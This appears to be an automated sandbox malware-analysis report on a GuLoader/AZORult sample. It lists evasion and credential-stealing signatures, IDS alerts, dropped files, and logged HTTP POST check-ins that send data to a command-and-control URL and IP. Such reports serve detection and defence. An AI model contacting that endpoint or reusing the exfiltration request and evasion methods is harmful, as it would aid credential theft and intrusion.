Loading ...

Play interactive tourEdit tour

Analysis Report linkercre.exe

Overview

General Information

Sample Name:linkercre.exe
Analysis ID:289433
MD5:acc9728c11b4de0ed1bd7c45bafad61f
SHA1:f192b7cec15b1b2963e022bd72610676c9b14fc4
SHA256:0ff22289861f8a6429298e1508c0d1557c4da9483ac7c6531d7e58bbd8a030f4

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • linkercre.exe (PID: 4320 cmdline: 'C:\Users\user\Desktop\linkercre.exe' MD5: ACC9728C11B4DE0ED1BD7C45BAFAD61F)
    • linkercre.exe (PID: 5812 cmdline: 'C:\Users\user\Desktop\linkercre.exe' MD5: ACC9728C11B4DE0ED1BD7C45BAFAD61F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: linkercre.exe PID: 4320JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: linkercre.exe PID: 4320JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus / Scanner detection for submitted sampleShow sources
      Source: linkercre.exeAvira: detected
      Multi AV Scanner detection for domain / URLShow sources
      Source: officestore.co.idVirustotal: Detection: 8%Perma Link
      Source: http://officestore.co.id/linkzer/PL341/index.phpVirustotal: Detection: 10%Perma Link
      Multi AV Scanner detection for submitted fileShow sources
      Source: linkercre.exeVirustotal: Detection: 39%Perma Link
      Source: linkercre.exeReversingLabs: Detection: 58%
      Source: 0.0.linkercre.exe.400000.0.unpackAvira: Label: TR/AD.VBCryptor.nncrr
      Source: 2.0.linkercre.exe.400000.0.unpackAvira: Label: TR/AD.VBCryptor.nncrr

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.3:49691 -> 103.247.10.55:80
      Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.3:49691
      Source: Joe Sandbox ViewIP Address: 103.247.10.55 103.247.10.55
      Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
      Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 99Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 60 8b 30 62 ed 47 10 8b 30 62 8b 30 6c e8 26 67 ea 26 66 9c 26 66 9b 45 17 8b 30 64 ea 46 17 8b 31 11 8b 30 62 8b 30 62 8b 30 65 eb 41 70 9d 32 16 eb Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410`0bG0b0l&g&f&fE0dF10b0b0eAp2
      Source: global trafficHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 49565Cache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: onedrive.live.com
      Source: unknownHTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 99Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 60 8b 30 62 ed 47 10 8b 30 62 8b 30 6c e8 26 67 ea 26 66 9c 26 66 9b 45 17 8b 30 64 ea 46 17 8b 31 11 8b 30 62 8b 30 62 8b 30 65 eb 41 70 9d 32 16 eb Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410`0bG0b0l&g&f&fE0dF10b0b0eAp2
      Source: nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: nss3.dll.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
      Source: nss3.dll.2.drString found in binary or memory: http://ocsp.thawte.com0
      Source: nss3.dll.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: nss3.dll.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: nss3.dll.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
      Source: nss3.dll.2.drString found in binary or memory: http://www.mozilla.com0
      Source: nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43AD6 NtSetInformationThread,NtWriteVirtualMemory,TerminateProcess,NtMapViewOfSection,0_2_02B43AD6
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4021A EnumWindows,NtSetInformationThread,TerminateProcess,0_2_02B4021A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43182 NtWriteVirtualMemory,LoadLibraryA,0_2_02B43182
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43773 NtProtectVirtualMemory,0_2_02B43773
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B414FE NtWriteVirtualMemory,0_2_02B414FE
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43ADE NtMapViewOfSection,0_2_02B43ADE
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4167B NtWriteVirtualMemory,0_2_02B4167B
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B40C6F NtWriteVirtualMemory,0_2_02B40C6F
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4026A NtSetInformationThread,TerminateProcess,0_2_02B4026A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4024A NtSetInformationThread,TerminateProcess,0_2_02B4024A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43585 NtWriteVirtualMemory,0_2_02B43585
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B417F7 NtWriteVirtualMemory,0_2_02B417F7
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43BED NtMapViewOfSection,0_2_02B43BED
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B41B3E NtWriteVirtualMemory,CreateFileA,0_2_02B41B3E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43B29 NtMapViewOfSection,0_2_02B43B29
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B41914 NtWriteVirtualMemory,0_2_02B41914
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B43B7A NtMapViewOfSection,0_2_02B43B7A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4115E NtWriteVirtualMemory,0_2_02B4115E
      Source: linkercre.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: api-ms-win-core-debug-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-datetime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-console-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
      Source: linkercre.exe, 00000000.00000002.371018547.0000000002A20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs linkercre.exe
      Source: linkercre.exe, 00000000.00000000.355453187.0000000000409000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepapbakkesys'ssa.exe vs linkercre.exe
      Source: linkercre.exe, 00000002.00000000.369609142.0000000000409000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepapbakkesys'ssa.exe vs linkercre.exe
      Source: linkercre.exeBinary or memory string: OriginalFilenamepapbakkesys'ssa.exe vs linkercre.exe
      Source: C:\Users\user\Desktop\linkercre.exeSection loaded: crtdll.dllJump to behavior
      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@3/48@3/1
      Source: C:\Users\user\Desktop\linkercre.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-57CDE79F-25FB1DEB-770EB1CE
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\Jump to behavior
      Source: linkercre.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\linkercre.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
      Source: nss3.dll.2.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: softokn3.dll.2.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
      Source: softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
      Source: nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
      Source: softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
      Source: softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
      Source: softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s;
      Source: softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
      Source: softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
      Source: nss3.dll.2.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: nss3.dll.2.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: nss3.dll.2.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
      Source: nss3.dll.2.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
      Source: linkercre.exeVirustotal: Detection: 39%
      Source: linkercre.exeReversingLabs: Detection: 58%
      Source: unknownProcess created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe'
      Source: C:\Users\user\Desktop\linkercre.exeProcess created: C:\Users\user\Desktop\linkercre.exe 'C:\Users\user\Desktop\linkercre.exe' Jump to behavior
      Source: C:\Users\user\Desktop\linkercre.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: mozglue.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: nss3.dll.2.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.2.dr
      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.2.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.2.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.2.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: mozglue.dll.2.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.2.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.2.dr
      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.2.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.2.dr
      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.2.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.2.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.2.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.2.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.2.dr
      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.2.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.2.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.2.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.2.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.2.dr

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: linkercre.exe PID: 4320, type: MEMORY
      Binary contains a suspicious time stampShow sources
      Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: linkercre.exe PID: 4320, type: MEMORY
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00403057 push edx; ret 0_2_0040320E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00402A72 push edx; ret 0_2_00402A81
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_0040510D push ebp; retf 0_2_0040510E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00405124 push ebp; retf 0_2_00405126
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00405334 push ebp; retf 0_2_00405336
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_00401C3A push eax; ret 0_2_00401C3B
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004034D1 push 647C8AE6h; iretd 0_2_004034D6
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004051D2 push ebp; retf 0_2_004051EE
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004050D8 push ebp; retf 0_2_004050DA
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_004051EF push ebp; retf 0_2_004051F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 0_2_02B4003A push edi; ret 0_2_02B40059
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06AA16 pushfd ; iretd 2_3_1E06A9D2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065619 push 52A9FB8Eh; iretd 2_3_1E06561E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06725A push edx; iretd 2_3_1E0672F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E067E6B pushfd ; retf 2_3_1E067E8E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0676A1 pushfd ; retf 2_3_1E0676A2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0672B8 push edx; iretd 2_3_1E0672F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0656C3 push cs; iretd 2_3_1E0656CD
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E068B12 push FFFFFFC3h; ret 2_3_1E068B3A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065339 push cs; iretd 2_3_1E065342
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E067341 push edx; iretd 2_3_1E0672F2
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E066B58 pushfd ; iretd 2_3_1E066B62
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E068F82 pushfd ; retf 2_3_1E068F86
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065BCF push ss; iretd 2_3_1E065BEF
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E0663F1 push es; iretd 2_3_1E0663FB
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E068FFE push ecx; ret 2_3_1E068FFF
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E066443 pushfd ; iretd 2_3_1E06644E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E066472 push eax; iretd 2_3_1E066479
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E065946 pushfd ; iretd 2_3_1E06594A
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06655F pushfd ; iretd 2_3_1E06656E
      Source: C:\Users\user\Desktop\linkercre.exeCode function: 2_3_1E06A9C3 pushfd ; iretd 2_3_1E06A9D2
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\softokn3.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\mozglue.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-file-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\linkercre.exeFile created: C:\Users\user\AppData\Local\Temp\1269D1DA\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
